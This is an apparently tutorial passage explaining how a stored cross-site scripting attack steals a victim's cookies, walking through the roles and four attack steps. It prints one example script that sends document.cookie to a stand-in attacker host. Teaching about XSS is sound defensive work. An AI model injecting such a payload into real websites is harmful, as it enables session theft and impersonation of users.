Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, an XSS attack involves three actors: the website, the victim, and the attacker.

The website serves HTML pages to users who request them. In our examples, it is located at http://website/.

• The website's database is a database that stores some of the user input included in the website's pages.

The victim is a normal user of the website who requests pages from it using his browser.

The attacker is a malicious user of the website who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website.

• The attacker's server is a web server controlled by the attacker for the sole purpose of stealing the victim's sensitive information. In our examples, it is located at http://attacker/.

In this example, we will assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website. This can be done by having the victim's browser parse the following HTML code:

<script>
window.location='http://attacker/?cookie='+document.cookie
</script>

This script navigates the user's browser to a different URL, triggering an HTTP request to the attacker's server. The URL includes the victim's cookies as a query parameter, which the attacker can extract from the request when it arrives to his server. Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.

From now on, the HTML code above will be referred to as the malicious string or the malicious script. It is important to note that the string itself is only malicious if it ultimately gets parsed as HTML in the victim's browser, which can only happen as the result of an XSS vulnerability in the website.

How the example attack works

The diagram below illustrates how this example attack can be performed by an attacker:

1. The attacker uses one of the website's forms to insert a malicious string into the website's database. 2. The victim requests a page from the website. 3. The website includes the malicious string from the database in the response and sends it to the victim. 4. The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.